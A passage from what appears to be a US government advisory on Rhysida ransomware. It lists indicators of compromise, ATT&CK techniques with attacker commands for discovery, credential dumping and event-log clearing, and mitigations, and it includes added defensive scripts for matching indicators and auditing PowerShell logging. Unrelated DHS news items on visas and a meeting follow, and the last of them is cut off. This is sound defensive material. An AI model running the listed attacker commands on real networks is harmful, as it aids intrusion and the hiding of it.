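Hash matching only catches the exact builds listed in the table; the string check generalizes to rebuilt binaries but, as the disclaimer above Table 1 notes, a hit should be investigated and confirmed before remediation is performed.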

INDICATORS OF COMPROMISE

On November 10, 2023, Sophos published TTPs and IOCs identified from analysis conducted for six separate incidents.[9] The C2 IP addresses listed in Table 3 were derived directly from Sophos’ investigations and are listed on GitHub among other indicators.[10]

Table 3: C2 IP Addresses Used for Rhysida Operations

C2 IP Address

5.39.222[.]67

5.255.99[.]59

51.77.102[.]106

108.62.118[.]136

108.62.141[.]161

146.70.104[.]249

156.96.62[.]58

157.154.194[.]6

Additional IOCs were obtained from FBI, CISA, and the MS-ISAC’s investigations and analysis. The email addresses listed in Table 4 are associated with Rhysida actors’ operations. Rhysida actors have been observed creating Onion Mail email accounts for services or victim communication, commonly in the format: [First Name][Last Name]@onionmail[.]org.

Table 4: Email Addresses Used to Support Rhysida Operations

Email Address

rhysidaeverywhere@onionmail[.]org

rhysidaofficial@onionmail[.]org
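
An added example (not part of the advisory) that turns Tables 3 and 4 into a log check: it refangs the indicators, parses IPv4 addresses instead of substring-matching them (so 15.39.222.67 does not hit on 5.39.222.67), flags the two known addresses, and separately flags any other sender at onionmail.org that fits the naming pattern described above for analyst review. The log lines and their key=value format are constructed.

```python
"""Match the defanged C2 addresses and e-mail indicators above against log lines.

Added example for this advisory, not code from the CSA. Indicators are copied from
Tables 3 and 4; the firewall and mail-gateway log lines are constructed for the
demonstration and their format is an assumption.
"""
import ipaddress
import re

C2_IPS_DEFANGED = [
    "5.39.222[.]67", "5.255.99[.]59", "51.77.102[.]106", "108.62.118[.]136",
    "108.62.141[.]161", "146.70.104[.]249", "156.96.62[.]58", "157.154.194[.]6",
]
EMAILS_DEFANGED = ["rhysidaeverywhere@onionmail[.]org", "rhysidaofficial@onionmail[.]org"]
ONIONMAIL_DOMAIN = "onionmail.org"   # the advisory's [First Name][Last Name]@onionmail[.]org pattern


def refang(indicator):
    """Undo the defanging used in reporting so the value can be compared with live data."""
    return indicator.replace("[.]", ".").replace("[:]", ":").replace("hxxp", "http")


C2_IPS = {ipaddress.ip_address(refang(ip)) for ip in C2_IPS_DEFANGED}
KNOWN_EMAILS = {refang(addr).lower() for addr in EMAILS_DEFANGED}

IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
EMAIL_RE = re.compile(r"[\w.+-]+@[\w-]+(?:\.[\w-]+)+")


def scan_line(line):
    """Return [(indicator_type, value), ...] for the indicators present in one log line."""
    hits = []
    for token in IPV4_RE.findall(line):
        try:
            ip = ipaddress.ip_address(token)   # rejects octets above 255
        except ValueError:
            continue
        if ip in C2_IPS:
            hits.append(("c2_ip", str(ip)))
    for addr in EMAIL_RE.findall(line):
        addr = addr.lower()
        if addr in KNOWN_EMAILS:
            hits.append(("known_email", addr))
        elif addr.endswith("@" + ONIONMAIL_DOMAIN):
            hits.append(("onionmail_sender", addr))   # fits the naming pattern; needs review
    return hits


def scan_logs(lines):
    """Return (line_number, line, hits) for every line carrying at least one indicator."""
    results = []
    for number, line in enumerate(lines, 1):
        hits = scan_line(line)
        if hits:
            results.append((number, line, hits))
    return results


# Constructed log lines: two C2 hits, one near-miss address, one known and one
# pattern-matching onionmail sender, and one benign DNS flow.
SAMPLE_LOG_LINES = [
    "2023-09-12T02:20:14Z fw01 src=10.0.4.22 dst=5.39.222.67 dport=443 proto=tcp action=allow",
    "2023-09-12T02:20:15Z fw01 src=10.0.4.22 dst=15.39.222.67 dport=443 proto=tcp action=allow",
    "2023-09-12T02:21:40Z fw01 src=10.0.4.22 dst=157.154.194.6 dport=4444 proto=tcp action=allow",
    "2023-09-12T03:02:09Z mx01 from=rhysidaofficial@onionmail.org to=ciso@example.com action=accept",
    "2023-09-12T03:05:11Z mx01 from=jane.doe@onionmail.org to=finance@example.com action=accept",
    "2023-09-12T03:06:00Z fw01 src=10.0.4.22 dst=9.9.9.9 dport=53 proto=udp action=allow",
]

if __name__ == "__main__":
    for number, line, hits in scan_logs(SAMPLE_LOG_LINES):
        print(f"line {number}: {hits}")
```

The onionmail_sender hit is deliberately weaker than a known-indicator match: the pattern describes how the actors name accounts, not a list of their accounts, so it belongs in a review queue rather than a blocking rule.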

Rhysida actors have also been observed using the following files and executables listed in Table 5 to support their operations.

Disclaimer: Organizations are encouraged to investigate the use of these files for related signs of compromise prior to performing remediation actions.

Table 5: Files Used to Support Rhysida Operations

File Name

Hash (SHA256)

Sock5.sh

48f559e00c472d9ffe3965ab92c6d298f8fb3a3f0d6d203cd2069bfca4bf3a57

PsExec64.exe

edfae1a69522f87b12c6dac3225d930e4848832e3c551ee1e7d31736bf4525ef

PsExec.exe

078163d5c16f64caa5a14784323fd51451b8c831c73396b967b4e35e6879937b

PsGetsid64.exe

201d8e77ccc2575d910d47042a986480b1da28cf0033e7ee726ad9d45ccf4daa

PsGetsid.exe

a48ac157609888471bf8578fb8b2aef6b0068f7e0742fccf2e0e288b0b2cfdfb

PsInfo64.exe

de73b73eeb156f877de61f4a6975d06759292ed69f31aaf06c9811f3311e03e7

PsInfo.exe

951b1b5fd5cb13cde159cebc7c60465587e2061363d1d8847ab78b6c4fba7501

PsLoggedon64.exe

fdadb6e15c52c41a31e3c22659dd490d5b616e017d1b1aa6070008ce09ed27ea

PsLoggedon.exe

d689cb1dbd2e4c06cd15e51a6871c406c595790ddcdcd7dc8d0401c7183720ef

PsService64.exe

554f523914cdbaed8b17527170502199c185bd69a41c81102c50dbb0e5e5a78d

PsService.exe

d3a816fe5d545a80e4639b34b90d92d1039eb71ef59e6e81b3c0e043a45b751c

Eula.txt

8329bcbadc7f81539a4969ca13f0be5b8eb7652b912324a1926fc9bfb6ec005a

psfile64.exe

be922312978a53c92a49fefd2c9f9cc098767b36f0e4d2e829d24725df65bc21

psfile.exe

4243dc8b991f5f8b3c0f233ca2110a1e03a1d716c3f51e88faf1d59b8242d329

pskill64.exe

7ba47558c99e18c2c6449be804b5e765c48d3a70ceaa04c1e0fae67ff1d7178d

pskill.exe

5ef168f83b55d2cbd2426afc5e6fa8161270fa6a2a312831332dc472c95dfa42

pslist64.exe

d3247f03dcd7b9335344ebba76a0b92370f32f1cb0e480c734da52db2bd8df60

pslist.exe

ed05f5d462767b3986583188000143f0eb24f7d89605523a28950e72e6b9039a

psloglist64.exe

5e55b4caf47a248a10abd009617684e969dbe5c448d087ee8178262aaab68636

psloglist.exe

dcdb9bd39b6014434190a9949dedf633726fdb470e95cc47cdaa47c1964b969f

pspasswd64.exe

8d950068f46a04e77ad6637c680cccf5d703a1828fbd6bdca513268af4f2170f

pspasswd.exe

6ed5d50cf9d07db73eaa92c5405f6b1bf670028c602c605dfa7d4fcb80ef0801

psping64.exe

d1f718d219930e57794bdadf9dda61406294b0759038cef282f7544b44b92285

psping.exe

355b4a82313074999bd8fa1332b1ed00034e63bd2a0d0367e2622f35d75cf140

psshutdown64.exe

4226738489c2a67852d51dbf96574f33e44e509bc265b950d495da79bb457400

psshutdown.exe

13fd3ad690c73cf0ad26c6716d4e9d1581b47c22fb7518b1d3bf9cfb8f9e9123

pssuspend64.exe

4bf8fbb7db583e1aacbf36c5f740d012c8321f221066cc68107031bd8b6bc1ee

pssuspend.exe

95a922e178075fb771066db4ab1bd70c7016f794709d514ab1c7f11500f016cd

PSTools.zip

a9ca77dfe03ce15004157727bb43ba66f00ceb215362c9b3d199f000edaa8d61

Pstools.chm

2813b6c07d17d25670163e0f66453b42d2f157bf2e42007806ebc6bb9d114acc

psversion.txt

8e43d1ddbd5c129055528a93f1e3fab0ecdf73a8a7ba9713dc4c3e216d7e5db4

psexesvc.exe

This artifact is created when a user establishes a connection using psexec. It is removed after the connection is terminated, which is why there is no hash available for this executable.

MITRE ATT&CK TACTICS AND TECHNIQUES

See Tables 6-15 for all referenced threat actor tactics and techniques in this advisory. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool.

Additional notable TTPs have been published by the Check Point Incident Response Team.[11]

Table 6: Resource Development

Technique Title

ID

Use

Develop Capabilities

T1587

Rhysida actors have been observed developing resources and custom tools, particularly with program names set to “Rhysida-0.1” to gain access to victim systems.

Table 7: Initial Access

Technique Title

ID

Use

Valid Accounts

T1078

Rhysida actors are known to use valid credentials to access internal VPN access points of victims.

Exploit Public-Facing Application

T1190

Rhysida actors have been identified exploiting Zerologon, a critical elevation of privilege vulnerability within Microsoft’s Netlogon Remote Protocol.

Phishing

T1566

Rhysida actors are known to conduct successful phishing attacks.

Table 8: Execution

Technique Title

ID

Use

Command and Scripting Interpreter: PowerShell

T1059.001

Rhysida actors used PowerShell commands (ipconfig, nltest, net) and various scripts to execute malicious actions.

Command and Scripting Interpreter: Windows Command Shell

T1059.003

Rhysida actors used batch scripting to place 1.ps1 on victim systems to automate ransomware execution.

Table 9: Privilege Escalation

Technique Title

ID

Use

Process Injection: Portable Executable Injection

T1055.002

Rhysida actors injected a Windows 64-bit PE cryptographic ransomware application into running processes on compromised systems.

Table 10: Defense Evasion

Technique Title

ID

Use

Indicator Removal: Clear Windows Event Logs

T1070.001

Rhysida actors used wevtutil.exe to clear Windows event logs, including system, application, and security logs.

Indicator Removal: File Deletion

T1070.004

Rhysida actors used PowerShell commands to delete the ransomware binary after encryption.

Hide Artifacts: Hidden Window

T1564.003

Rhysida actors have executed hidden PowerShell windows.

Table 11: Credential Access

Technique Title

ID

Use

OS Credential Dumping: NTDS

T1003.003

Rhysida actors have been observed using secretsdump to extract credentials and other confidential information from a system, then dumping NTDS credentials.

Modify Registry

T1112

Rhysida actors were observed running registry modification commands via cmd.exe.

Table 12: Discovery

Technique Title

ID

Use

System Network Configuration Discovery

T1016

Rhysida actors used the ipconfig command to enumerate victim system network settings.

Remote System Discovery

T1018

Rhysida actors used the command net group “domain computers” /domain to enumerate computers joined to a victim domain.

System Owner/User Discovery

T1033

Rhysida actors leveraged whoami and various net commands within PowerShell to identify logged-in users.

Permission Groups Discovery: Local Groups

T1069.001

Rhysida actors used the command net localgroup administrators to identify accounts with local administrator rights.

Permission Groups Discovery: Domain Groups

T1069.002

Rhysida actors used the command net group “domain admins” /domain to identify domain administrators.

Account Discovery: Domain Account

T1087.002

Rhysida actors used the command net user [username] /domain to identify account information.

Domain Trust Discovery

T1482

Rhysida actors used the Windows utility nltest to enumerate domain trusts.

Table 13: Lateral Movement

Technique Title

ID

Use

Remote Services: Remote Desktop Protocol

T1021.001

Rhysida actors are known to use RDP for lateral movement.

Remote Services: SSH

T1021.004

Rhysida actors used compromised user credentials with PuTTY to remotely connect to victim systems via SSH.

Table 14: Command and Control

Technique Title

ID

Use

Remote Access Software

T1219

Rhysida actors have been observed using the AnyDesk software to obtain remote access to victim systems and maintain persistence.

Table 15: Impact

Technique Title

ID

Use

Data Encrypted for Impact

T1486

Rhysida actors encrypted victim data with ChaCha20, protecting the symmetric key material with a 4096-bit RSA key.

Financial Theft

T1657

Rhysida actors reportedly engage in “double extortion”— demanding a ransom payment to decrypt victim data and threatening to publish the sensitive exfiltrated data unless the ransom is paid.

MITIGATIONS

FBI, CISA, and the MS-ISAC recommend that organizations implement the mitigations below to improve your organization’s cybersecurity posture. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, and TTPs. Visit CISA’s Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections.

These mitigations apply to all critical infrastructure organizations and network defenders. FBI, CISA, and the MS-ISAC recommend incorporating secure-by-design and -default principles, limiting the impact of ransomware techniques and strengthening overall security posture. For more information on secure by design, see CISA’s Secure by Design webpage.

  • Require phishing-resistant MFA for all services to the extent possible, particularly for webmail, VPN, and accounts that access critical systems [CPG 2.H].
  • Disable command-line and scripting activities and permissions. Privilege escalation and lateral movement often depend on software utilities running from the command line. If threat actors are not able to run these tools, they will have difficulty escalating privileges and/or moving laterally [CPG 2.N].
  • Implement verbose and enhanced logging within processes such as command line auditing[12] and process tracking[13].
  • Restrict the use of PowerShell using Group Policy and only grant access to specific users on a case-by-case basis. Typically, only those users or administrators who manage the network or Windows operating systems should be permitted to use PowerShell [CPG 2.E].
  • Update Windows PowerShell or PowerShell Core to the latest version and uninstall all earlier PowerShell versions. Logs from Windows PowerShell prior to version 5.0 are either non-existent or do not record enough detail to aid in enterprise monitoring and incident response activities [CPG 1.E, 2.S, 2.T].
  • Enable enhanced PowerShell logging [CPG 2.T, 2.U].
    • PowerShell logs contain valuable data, including historical operating system and registry interaction and possible TTPs of a threat actor’s PowerShell use.
    • Ensure PowerShell instances (using the latest version) have module, script block, and transcription logging enabled (i.e., enhanced logging).
    • The two logs that record PowerShell activity are the PowerShell Windows event log and the PowerShell operational log. FBI, CISA, and the MS-ISAC recommend turning on these two Windows event logs with a retention period of at least 180 days. These logs should be checked on a regular basis to confirm whether the log data has been deleted or logging has been turned off. Set the permitted storage size for both logs as large as possible.
  • Restrict the use of RDP and other remote desktop services to known user accounts and groups. If RDP is necessary, apply best practices such as [CPG 2.W]:
    • Implement MFA for privileged accounts using RDP.
    • Use Remote Credential Guard[14] to protect credentials, particularly domain administrator or other high value accounts.
    • Audit the network for systems using RDP.
    • Close unused RDP ports.
    • Enforce account lockouts after a specified number of attempts.
    • Log RDP login attempts.
  • Secure remote access tools by:
    • Implementing application controls to manage and control execution of software, including allowlisting remote access programs. Application controls should prevent the installation and execution of portable versions of unauthorized remote access and other software. A properly configured application allowlisting solution will block any unlisted application execution. Allowlisting is important as antivirus solutions may fail to detect the execution of malicious portable executables when the files use any combination of compression, encryption, or obfuscation.
    • Apply the recommendations in CISA’s joint Guide to Securing Remote Access Software.
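The following script is an added example, not part of the advisory, that audits the PowerShell logging settings the bullets above call for (module, script block, and transcription logging; the two PowerShell event logs enabled and generously sized; a check for recent clearing of those logs) and optionally enables them with -Fix. The registry paths are the standard PowerShell Group Policy keys; the transcript directory and the 1 GB minimum log size are assumed values.

```powershell
# Added example (not from the advisory). Run in an elevated PowerShell session.
function Test-PowerShellLogging {
    [CmdletBinding()]
    param(
        [switch]$Fix,
        # Assumed transcript destination; in practice use an ACL-protected, write-only share.
        [string]$TranscriptDir = 'C:\PSTranscripts',
        # Assumed minimum channel size; the advisory only says "as large as possible".
        [long]$MinLogBytes = 1GB
    )
    $base = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell'
    $checks = @(
        @{ Name = 'ScriptBlockLogging'; Key = "$base\ScriptBlockLogging"; Value = 'EnableScriptBlockLogging' },
        @{ Name = 'ModuleLogging';      Key = "$base\ModuleLogging";      Value = 'EnableModuleLogging' },
        @{ Name = 'Transcription';      Key = "$base\Transcription";      Value = 'EnableTranscripting' }
    )
    $report = [ordered]@{}
    foreach ($c in $checks) {
        # Each policy is a DWORD of 1 under its own subkey; missing key means "not enabled".
        $cur = (Get-ItemProperty -Path $c.Key -Name $c.Value -ErrorAction SilentlyContinue).($c.Value)
        $ok = ($cur -eq 1)
        if (-not $ok -and $Fix) {
            New-Item -Path $c.Key -Force | Out-Null
            Set-ItemProperty -Path $c.Key -Name $c.Value -Value 1 -Type DWord
            $ok = $true
        }
        $report[$c.Name] = $ok
    }
    if ($Fix) {
        # Module logging records nothing until at least one module name pattern is listed.
        New-Item -Path "$base\ModuleLogging\ModuleNames" -Force | Out-Null
        Set-ItemProperty -Path "$base\ModuleLogging\ModuleNames" -Name '*' -Value '*'
        # Transcripts need a destination; invocation headers add a timestamp per command.
        New-Item -Path $TranscriptDir -ItemType Directory -Force | Out-Null
        Set-ItemProperty -Path "$base\Transcription" -Name 'OutputDirectory' -Value $TranscriptDir
        Set-ItemProperty -Path "$base\Transcription" -Name 'EnableInvocationHeader' -Value 1 -Type DWord
    }
    # The two logs the advisory names: both must be enabled and sized generously.
    foreach ($log in 'Windows PowerShell', 'Microsoft-Windows-PowerShell/Operational') {
        $cfg = Get-WinEvent -ListLog $log -ErrorAction SilentlyContinue
        $ok = $cfg -and $cfg.IsEnabled -and ($cfg.MaximumSizeInBytes -ge $MinLogBytes)
        if (-not $ok -and $Fix) {
            # wevtutil sl: /e enables the channel, /ms sets its maximum size in bytes.
            wevtutil.exe sl "$log" /e:true "/ms:$MinLogBytes" | Out-Null
            $ok = $true
        }
        $report[$log] = $ok
    }
    # Event 104 (source Microsoft-Windows-Eventlog) in the System log is written whenever
    # any event log is cleared; one naming a PowerShell log is the deletion to watch for.
    $cleared = Get-WinEvent -FilterHashtable @{ LogName = 'System'; Id = 104; StartTime = (Get-Date).AddDays(-180) } `
        -ErrorAction SilentlyContinue | Where-Object { $_.Message -match 'PowerShell' }
    $report['PowerShellLogClearedInLast180Days'] = [bool]$cleared
    [pscustomobject]$report
}

# Audit only; add -Fix to apply the settings.
Test-PowerShellLogging | Format-List
```

Settings written under HKLM:\SOFTWARE\Policies are overwritten by domain Group Policy on the next refresh, so in a domain the same values belong in a GPO rather than in a local script.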

In addition, FBI, CISA, and the MS-ISAC recommend network defenders apply the following mitigations to limit potential adversarial use of common system and network discovery techniques, and to reduce the impact and risk of compromise by ransomware or data extortion actors:

  • Keep all operating systems, software, and firmware up to date. Timely patching is one of the most efficient and cost-effective steps an organization can take to minimize its exposure to cybersecurity threats. Prioritize patching known exploited vulnerabilities in internet-facing systems [CPG 1.E].
  • Segment networks to prevent the spread of ransomware. Network segmentation can help prevent the spread of ransomware by controlling traffic flows between—and access to—various subnetworks and by restricting adversary lateral movement [CPG 2.F].
  • Identify, detect, and investigate abnormal activity and potential traversal of the indicated ransomware with a network monitoring tool. To aid in detecting ransomware, implement a tool that logs and reports all network traffic, including lateral movement activity on a network. Endpoint detection and response (EDR) tools are particularly useful for detecting lateral connections as they have insight into common and uncommon network connections for each host [CPG 3.A].
  • Audit user accounts with administrative privileges and configure access controls according to the principle of least privilege (PoLP) [CPG 2.E].
  • Implement time-based access for accounts set at the admin level and higher [CPG 2.A, 2.E]. For example, the just-in-time (JIT) access method provisions privileged access when needed and can support the enforcement of PoLP (as well as the zero trust model). This is a process where a network-wide policy is set in place to automatically disable admin accounts at the AD level when the account is not in direct need. Individual users may submit their requests through an automated process that grants them access to a specified system for a set timeframe when they need to support the completion of a certain task.
  • Implement a recovery plan to maintain and retain multiple copies of sensitive or proprietary data and servers in a physically separate, segmented, and secure location (e.g., hard drive, storage device, or the cloud).
  • Maintain offline backups of data and regularly maintain backups and their restoration (daily or weekly at minimum). By instituting this practice, organizations limit the severity of disruption to business operations [CPG 2.R].
  • Ensure all backup data is encrypted, immutable (i.e., cannot be altered or deleted), and covers the entire organization’s data infrastructure [CPG 2.K, 2.L, 2.R].
  • Forward log files to a hardened centralized logging server, preferably on a segmented network [CPG 2.F]. Review logging retention rates, such as for VPNs and network-based logs.
  • Consider adding an email banner to emails received from outside your organization [CPG 2.M].
  • Disable hyperlinks in received emails.

VALIDATE SECURITY CONTROLS

In addition to applying mitigations, FBI, CISA, and the MS-ISAC recommend exercising, testing, and validating your organization’s security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. FBI, CISA, and the MS-ISAC recommend testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.

To get started:

  1. Select an ATT&CK technique described in this advisory (see Tables 6-15).
  2. Align your security technologies against the technique.
  3. Test your technologies against the technique.
  4. Analyze your detection and prevention technologies’ performance.
  5. Repeat the process for all security technologies to obtain a set of comprehensive performance data.
  6. Tune your security program, including people, processes, and technologies, based on the data generated by this process.

FBI, CISA, and the MS-ISAC recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.

RESOURCES

REPORTING

FBI is seeking any information that can be shared, to include boundary logs showing communication to and from foreign IP addresses, a sample ransom note, communications with Rhysida actors, Bitcoin wallet information, decryptor files, and/or a benign sample of an encrypted file.

Additional details requested include: a targeted company point of contact, status and scope of infection, estimated loss, operational impact, transaction IDs, date of infection, date detected, initial attack vector, and host and network-based indicators.

FBI and CISA do not encourage paying ransom as payment does not guarantee victim files will be recovered. Furthermore, payment may also embolden adversaries to target additional organizations, encourage other threat actors to engage in the distribution of ransomware, and/or fund illicit activities. Regardless of whether you or your organization have decided to pay the ransom, FBI and CISA urge you to promptly report ransomware incidents to the FBI’s Internet Crime Complaint Center (IC3) at Ic3.gov, a local FBI Field Office, or CISA via the agency’s Incident Reporting System or its 24/7 Operations Center at report@cisa.gov or (888) 282-0870.

REFERENCES

  1. Microsoft: DEV-0832 (Vice Society) Opportunistic Ransomware Campaigns Impacting US Education Sector
  2. FortiGuard Labs: Ransomware Roundup – Rhysida
  3. Microsoft: Security Update Guide – CVE-2020-1472
  4. Microsoft: Master File Table (Local File Systems)
  5. SentinelOne: Rhysida
  6. Secplicity: Scratching the Surface of Rhysida Ransomware
  7. Cisco Talos: What Cisco Talos Knows about the Rhysida Ransomware
  8. SOC Radar: Rhysida Ransomware Threat Profile
  9. Sophos: A Threat Cluster’s Switch from Vice Society to Rhysida
  10. Sophos: Vice Society – Rhysida IOCs (GitHub)
  11. Check Point Research: Rhysida Ransomware – Activity and Ties to Vice Society
  12. Microsoft: Command Line Process Auditing
  13. Microsoft: Audit Process Tracking
  14. Microsoft: Remote Credential Guard

ACKNOWLEDGEMENTS

Sophos contributed to this CSA.

DISCLAIMER

The information in this report is being provided “as is” for informational purposes only. FBI, CISA, and the MS-ISAC do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by FBI, CISA, and the MS-ISAC.

VERSION HISTORY

November 15, 2023: Initial version.

DPIAC Meeting November 7, 2023

Source: US Department of Homeland Security

The Data Privacy and Integrity Advisory Committee (DPIAC) will hold a public meeting.

LOCATION: Conference Call ONLY. Consult the Agenda for the number.

RSVP: Members of the public who wish to attend are requested to register in advance by sending an email to: privacycommittee@hq.dhs.gov or calling 202-343-1717.

Consult the Federal Register for more details. Meeting materials can be found here.

DHS to Supplement H-2B Cap with Nearly 65,000 Additional Visas for FY 2024

Source: US Department of Homeland Security

News release originally published by the Department of Homeland Security.

Increase Will Help Address the Need for Seasonal Workers and Reduce Irregular Migration

WASHINGTON – Today, the Department of Homeland Security (DHS), in consultation with the Department of Labor (DOL), announced that it expects to make an additional 64,716 H-2B temporary nonagricultural worker visas available for Fiscal Year (FY) 2024, on top of the congressionally mandated 66,000 H-2B visas that are available each fiscal year. These additional H-2B visas represent the maximum permitted under the September 2023 Fiscal Year 2024 Continuing Resolution. American businesses in industries such as hospitality and tourism, landscaping, seafood processing, and more turn to seasonal or other temporary workers in the H-2B program to help them meet demand from consumers. The supplemental visa allocation will help address the need for seasonal or other temporary workers in areas where too few U.S. workers are available, helping contribute to the American economy. The H-2B visa expansion advances the Biden Administration’s pledge, under the Los Angeles Declaration for Migration and Protection, to expand lawful pathways as an alternative to irregular migration.

By announcing plans to make these supplemental visas available at the outset of FY 2024, the Departments will ensure U.S. businesses with workforce needs are able to plan ahead and find the seasonal and other temporary workers they need. At the same time, DHS and DOL have put in place robust protections for U.S. and foreign workers alike, including by ensuring that employers first seek out and recruit American workers for the jobs to be filled, as the visa program requires, and that foreign workers hired are not exploited by unscrupulous employers. Most recently, both DHS and DOL proposed regulations to further strengthen worker protections in the H-2A and H-2B visa programs, and the White House-led H-2B Worker Protection Taskforce released a report detailing new actions to be taken by Federal government agencies to strengthen protections for vulnerable H-2B and similarly situated U.S. workers.

“The Department of Homeland Security is committed to maintaining strong economic growth and meeting the labor demand in the United States, while strengthening worker protections for U.S. and foreign workers,” said Secretary of Homeland Security Alejandro N. Mayorkas. “We are using the tools that we have available to bolster the resiliency of our industries and release the maximum number of additional H-2B visas for U.S. businesses to ensure they can plan for their peak season labor needs. We also continue to take steps to strengthen protections for workers and safeguard the integrity of the program from unscrupulous employers who would seek to exploit workers by paying substandard wages and maintaining unsafe work conditions. Our maximum use of the H-2B visa program also continues to build on our commitment to expand lawful pathways as an alternative to irregular migration, thereby cutting out the ruthless smugglers who prey on the vulnerable.”

The H-2B supplemental is expected to include an allocation of 20,000 visas to workers from Colombia, Costa Rica, Ecuador, El Salvador, Guatemala, Haiti, and Honduras. This country specific allocation is part of the Biden-Harris Administration’s efforts to build a safe, orderly, and humane immigration system that includes expanding lawful pathways for immigration while strengthening consequences for those without a legal basis to remain in the United States.

In addition to the 20,000 country specific allocation, 44,716 supplemental visas would be available to returning workers who received an H-2B visa, or were otherwise granted H-2B status, during one of the last three fiscal years. The regulation would allocate these supplemental visas for returning workers between the first half and second half of the fiscal year to account for the need for additional seasonal and other temporary workers over the course of the year, with a portion of the second half allocation reserved to meet the demand for workers during the peak summer season.

The H-2B program permits employers to temporarily hire noncitizens to perform nonagricultural labor or services in the United States. The employment must be of a temporary nature, such as a one-time occurrence, seasonal need, or intermittent need. Employers seeking H-2B workers must take a series of steps to test the U.S. labor market. They must obtain certification from DOL that there are not enough U.S. workers who are able, willing, qualified, and available to perform the temporary work for which they seek a prospective foreign worker, and that employing H-2B workers will not adversely affect the wages and working conditions of similarly employed U.S. workers.

The maximum period of stay in H-2B classification is three years. A person who has held H-2B nonimmigrant status for a total of three years must depart and remain outside of the United States for an uninterrupted period of three months before seeking readmission as an H-2B nonimmigrant.

DHS and DOL are committed to protecting all H-2B workers from exploitation and abuse, and to ensuring, consistent with law, that employers do not refuse to hire or appropriately recruit U.S. workers who are able, willing, qualified, and available to perform the temporary work. The forthcoming temporary final rule implementing this allocation is expected to feature several provisions to protect both U.S. and H-2B workers.

Additional details on H-2B program safeguards, as well as eligibility and filing requirements, will be available in the temporary final rule when published and on the USCIS webpage.

Engagement with USCIS on the EB-5 Immigrant Investor Program

Source: US Department of Homeland Security

The Department of Homeland Security’s Office of the Citizenship and Immigration Services Ombudsman (CIS Ombudsman) invites you to participate in a joint webinar with U.S. Citizenship and Immigration Services (USCIS) on the EB-5 Immigrant Investor Program and implementation of the EB-5 Reform and Integrity Act of 2022 (RIA) on Monday, October 30, 2023, from 2 to 3 p.m. Eastern Time.

The RIA revised certain eligibility requirements for the EB-5 program and reformed the regional center program. During the webinar, staff from the CIS Ombudsman and USCIS’ Immigrant Investor Program Office will share information and seek feedback on USCIS’ recent policy guidance on changes made by the RIA and other EB-5 program updates.

During the webinar, participants will be able to submit questions and comments. The questions and comments will be reviewed and shared with USCIS to address, as appropriate, in future engagements or through other communications.

Why This Is Important

USCIS has provided additional guidance on its interpretation of changes to the EB-5 program in the Immigration and Nationality Act (INA) made by the RIA. USCIS published this guidance on October 11, 2023, on its EB-5 Questions and Answers (updated Oct. 2023) page.

The RIA added new protections for investors in terminated regional centers. USCIS will discuss the guidance for pre-RIA investors associated with regional centers that are terminated. Additionally, the RIA changed required investment timeframes for EB-5 investors who file for classification after the RIA went into effect. USCIS will cover these revised requirements.

To Join

Please join the webinar on Monday, October 30 at 2 p.m. Eastern Time by clicking on this Teams Live link. Registration is not required. For more information on attending a Teams event, see Microsoft’s Attend a live event in Teams page.

If you require a reasonable accommodation to participate in the webinar, please contact us by email at CISOmbudsman.publicaffairs@hq.dhs.gov no later than Wednesday, October 25, 2023. Live captions are available in Microsoft Teams, and you can learn more on the Use live captions in a Teams meeting page.

More Information

For more information on the EB-5 program, visit USCIS’ EB-5 Immigrant Investor Program page.

DHS Issues Proposed Rule to Modernize the H-1B Specialty Occupation Worker Program

Source: US Department of Homeland Security

USCIS seeks to update regulations with proposed rulemaking to improve program efficiency and integrity

WASHINGTON – Today, the Department of Homeland Security (DHS), through U.S. Citizenship and Immigration Services (USCIS), published a Notice of Proposed Rulemaking (NPRM) that would modernize the H-1B specialty occupation worker program by streamlining eligibility requirements, improving program efficiency, providing greater benefits and flexibilities for employers and workers, and strengthening integrity measures. The H-1B program helps U.S. employers hire the employees they need to meet their business needs and remain competitive in the global marketplace, while adhering to all U.S. worker protections under the law.

“DHS continues to develop and implement regulations that increase efficiency and improve processes for employers and workers navigating the immigration system,” said Secretary of Homeland Security Alejandro N. Mayorkas. “The Biden-Harris Administration’s priority is to attract global talent, reduce undue burdens on employers, and prevent fraud and abuse in the immigration system.”

The H-1B nonimmigrant visa program allows U.S. employers to temporarily employ foreign workers in specialty occupations, defined by statute as occupations that require highly specialized knowledge and a bachelor’s or higher degree in the specific specialty, or its equivalent.

The proposed rule would change how USCIS conducts the H-1B registration selection process to reduce the possibility of misuse and fraud. Under the current process, the more registrations that are submitted on behalf of an individual, the higher chance that individual will be selected in a lottery. Under the new proposal, each unique individual who has a registration submitted on their behalf would be entered into the selection process once, regardless of the number of registrations submitted on their behalf. This would improve the chances that a legitimate registration would be selected by significantly reducing or eliminating the advantage of submitting multiple registrations for the same beneficiary solely to increase the chances of selection. Furthermore, it could also give beneficiaries more choice between legitimate job offers because each registrant who submitted a registration for a selected beneficiary would have the ability to file an H-1B petition on behalf of the beneficiary.

Among additional provisions, the proposed rule would improve the H-1B program by:

  • Streamlining eligibility requirements – criteria for specialty occupation positions would be revised to reduce confusion between the public and adjudicators and to clarify that a position may allow a range of degrees, although there must be a direct relationship between the required degree field(s) and the duties of the position;
  • Improving program efficiency – the proposed rule codifies that adjudicators generally should defer to a prior determination when no underlying facts have changed at time of a new filing;
  • Providing greater benefits and flexibilities for employers and workers – certain exemptions to the H-1B cap would be expanded for certain nonprofit entities or governmental research organizations as well as beneficiaries who are not directly employed by a qualifying organization. DHS would also extend certain flexibilities for students on an F-1 visa when students are seeking to change their status to H-1B. Additionally, DHS would establish new H-1B eligibility requirements for rising entrepreneurs; and
